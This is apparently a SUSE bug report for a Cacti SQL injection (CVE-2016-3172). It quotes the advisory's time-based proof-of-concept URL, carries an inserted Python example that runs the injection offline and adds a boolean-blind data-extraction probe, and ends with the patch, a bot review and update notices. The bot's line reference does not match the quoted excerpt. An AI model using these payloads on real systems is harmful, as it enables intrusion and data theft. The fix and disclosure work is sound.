Bug 971357 - (CVE-2016-3172) VUL-0: CVE-2016-3172: cacti: SQL Injection Vulnerability
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Component: Incidents
Version: unspecified
Hardware: Other
OS: Other
Priority: P3 - Medium
Severity: Normal
Target Milestone: ---
Assigned To: Aeneas Jaißle
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/163357/
Depends on:
Blocks:
Reported: 2016-03-16 09:51 UTC by Victor Pereira
Modified: 2018-08-03 22:12 UTC
CC: 3 users

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---
Description Victor Pereira 2016-03-16 09:51:54 UTC
CVE-2016-3172

==========================
Advisory: Cacti SQL Injection Vulnerability
Author: Do9gy of Tencent Security Platform Department
Affected Version: 0.8.8g (the latest version and older versions)
==========================
Vulnerability Description
==========================

Recently, I found a SQL Injection Vulnerability in the 'Cacti-0.8.8g' program. Cacti is widely used in many companies.
Vulnerable file: /cacti/tree.php:
line 208:
==========================================================================================================================================
    switch ($current_type) {
    case TREE_ITEM_TYPE_HEADER:
        $i = 0;
        /* it's nice to default to the parent sorting style for new items */
        if (empty($_GET["id"])) {
            $default_sorting_type = db_fetch_cell("select sort_children_type from graph_tree_items where id=" . $_GET["parent_id"]);
        }else{
            $default_sorting_type = TREE_ORDERING_NONE;
        }

==========================================================================================================================================

The parameter parent_id is used without any validation.
==========================
POC && EXP
==========================
1. Login

2. http://target/cacti-0.8.8g/tree.php?action=item_edit&tree_id=2&parent_id=8%20and%20sleep(1)

3. mysql log: select sort_children_type from graph_tree_items where id=8 and sleep(1)

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3172
http://seclists.org/oss-sec/2016/q1/651
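The following is an added example, not code from the bug report, the advisory or the Cacti project. It models the concatenation on the quoted tree.php line in Python against an in-memory SQLite table so the injection can be run offline: vulnerable_query() reproduces the exact statement seen in the mysql log above for the advisory's parent_id payload, and vulnerable_fetch_cell() executes it. Because SQLite has no sleep() function, the time-based PoC is exercised here as a boolean-blind probe through the same injection point, which goes one step beyond the advisory by showing that an attacker can evaluate an arbitrary subquery one predicate at a time. The hardened form validates parent_id as a decimal integer and binds it as a query parameter. The table contents, the names make_db, validate_input_number, fixed_fetch_cell, blind_probe and the handling of an empty parent_id are all assumptions of this example; validate_input_number is a stand-in for, not a copy of, Cacti's input_validate_input_number().

```python
import re
import sqlite3

# Constructed stand-in for Cacti's graph_tree_items table (not real Cacti data):
# two tree items, each with a recognisable sort_children_type value.
SAMPLE_ROWS = [(8, 1), (9, 2)]


def make_db():
    """Create an in-memory SQLite database holding the constructed sample table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE graph_tree_items (id INTEGER PRIMARY KEY, sort_children_type INTEGER)"
    )
    conn.executemany("INSERT INTO graph_tree_items VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_query(parent_id):
    """Build the query the way the quoted tree.php line does: raw concatenation, no validation."""
    return "select sort_children_type from graph_tree_items where id=" + parent_id


def vulnerable_fetch_cell(conn, parent_id):
    """Run the concatenated query; return the first cell or None (models db_fetch_cell())."""
    row = conn.execute(vulnerable_query(parent_id)).fetchone()
    return row[0] if row else None


class InputValidationError(ValueError):
    """Raised where the application would abort the request with an input error page."""


def validate_input_number(value):
    """Stand-in (assumption) for input_validate_input_number(): optional sign plus decimal digits only.

    An empty value is passed through unchanged so that requests which legitimately omit
    parent_id are not rejected; the quoted branch only runs when id is empty, so the
    parameter is not always present. That behaviour is this example's choice, not Cacti's.
    """
    if value is None or value == "":
        return value
    if not re.fullmatch(r"-?[0-9]+", value):
        raise InputValidationError("parent_id must be numeric: %r" % (value,))
    return value


def fixed_fetch_cell(conn, parent_id):
    """Hardened form: validate first, then bind the value as an integer parameter."""
    pid = validate_input_number(parent_id)
    if pid is None or pid == "":
        return None
    row = conn.execute(
        "select sort_children_type from graph_tree_items where id=?", (int(pid),)
    ).fetchone()
    return row[0] if row else None


def blind_probe(conn, base_id, condition):
    """Boolean-blind probe through the vulnerable path: True if the injected condition holds.

    The advisory's PoC appends 'and sleep(1)' (time-based); SQLite has no sleep(), so the
    same injection point is driven with a boolean predicate instead. A row comes back
    only when the predicate is true, which is enough to read data one bit at a time.
    """
    return vulnerable_fetch_cell(conn, "%d and (%s)" % (base_id, condition)) is not None


if __name__ == "__main__":
    db = make_db()
    # Same statement as the mysql log line quoted in the advisory.
    print(vulnerable_query("8 and sleep(1)"))
    print("row 8 returned with injected true predicate:", blind_probe(db, 8, "1=1"))
    print("row 8 suppressed with injected false predicate:", blind_probe(db, 8, "1=0"))
    print("first table name starts with 'g':",
          blind_probe(db, 8, "substr((select name from sqlite_master limit 1),1,1)='g'"))
    try:
        fixed_fetch_cell(db, "8 and 1=1")
    except InputValidationError as exc:
        print("hardened path rejected payload:", exc)
    print("hardened path, legitimate id:", fixed_fetch_cell(db, "8"))
```

Validation alone (the approach the patch in the next comment takes) stops the payload because it aborts before the query is built; binding the value as a parameter additionally guarantees that, even if the validation block is skipped or reordered, the database never parses attacker-controlled text as SQL.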
Comment 1 Victor Pereira 2016-03-16 09:52:48 UTC
This seems to fix it...

diff -u tree.php.orig tree.php
--- tree.php.orig       2016-03-15 15:15:37.646641203 -0500
+++ tree.php    2016-03-15 15:19:45.966120414 -0500
@@ -153,6 +153,7 @@
        /* ================= input validation ================= */
        input_validate_input_number(get_request_var("id"));
        input_validate_input_number(get_request_var("tree_id"));
+       input_validate_input_number(get_request_var("parent_id"));
        /* ==================================================== */

        if (!empty($_GET["id"])) {
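Review bot: the added input_validate_input_number(get_request_var("parent_id")) line guards the query only by aborting the request on non-numeric input; the query on tree.php line 57 of the quoted excerpt still reads $_GET["parent_id"] directly and concatenates it, so the validated value is never the one used. Consider having that query take the value through get_request_var("parent_id") after validation, or better, cast it to an integer or bind it as a query parameter, so the statement cannot be reached with raw request input if this validation block is ever reordered or bypassed. Also note that the new check runs unconditionally alongside id and tree_id, while the vulnerable branch only runs when id is empty; confirm that input_validate_input_number accepts an absent parent_id, otherwise item_edit requests that carry an id and no parent_id will now be rejected.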
Comment 3 Swamp Workflow Management 2016-03-16 23:00:33 UTC
bugbot adjusting priority
Comment 4 David Liedke 2016-05-09 12:05:34 UTC
Cacti 0.8.8h released.

Fix for 0.8.8f:
https://build.opensuse.org/request/show/394348
Comment 5 Aeneas Jaißle 2016-05-11 09:37:28 UTC
SR#394348 accepted.

Maintenance target got moved to project openSUSE:Maintenance:5077
Comment 6 Swamp Workflow Management 2016-05-18 12:09:56 UTC
openSUSE-SU-2016:1328-1: An update that fixes two vulnerabilities is now available.

Category: security (moderate)
Bug References: 971357,974013
CVE References: CVE-2016-3172,CVE-2016-3659
Sources used:
openSUSE Leap 42.1 (src):    cacti-0.8.8f-11.1
openSUSE 13.2 (src):    cacti-0.8.8f-4.16.1
Comment 7 Marcus Meissner 2016-08-01 15:10:10 UTC
released
Comment 8 Swamp Workflow Management 2018-07-28 18:11:41 UTC
This is an autogenerated message for OBS integration:
This bug (971357) was mentioned in
https://build.opensuse.org/request/show/625957 Backports:SLE-12 / cacti
Comment 9 Swamp Workflow Management 2018-08-03 22:12:59 UTC
openSUSE-OU-2018:2194-1: An update that fixes 33 vulnerabilities is now available.

Category: optional (low)
Bug References: 022564,1047512,1048102,1050950,1051633,1054390,1054742,1067163,1067164,1067166,1068028,1101024,1101139,837440,862993,867607,870821,872008,934187,937997,958863,958977,960678,965930,971357,974013
CVE References: CVE-2006-6799,CVE-2007-3112,CVE-2007-3113,CVE-2013-5588,CVE-2013-5589,CVE-2014-2326,CVE-2014-2327,CVE-2014-2328,CVE-2014-2708,CVE-2014-2709,CVE-2014-4000,CVE-2014-4002,CVE-2014-5025,CVE-2014-5026,CVE-2015-4342,CVE-2015-4634,CVE-2015-8369,CVE-2015-8377,CVE-2015-8604,CVE-2016-2313,CVE-2016-3172,CVE-2016-3659,CVE-2017-10970,CVE-2017-11163,CVE-2017-11691,CVE-2017-12065,CVE-2017-12927,CVE-2017-12978,CVE-2017-15194,CVE-2017-16641,CVE-2017-16660,CVE-2017-16661,CVE-2017-16785
Sources used:
SUSE Package Hub for SUSE Linux Enterprise 12 (src):    cacti-1.1.38-2.1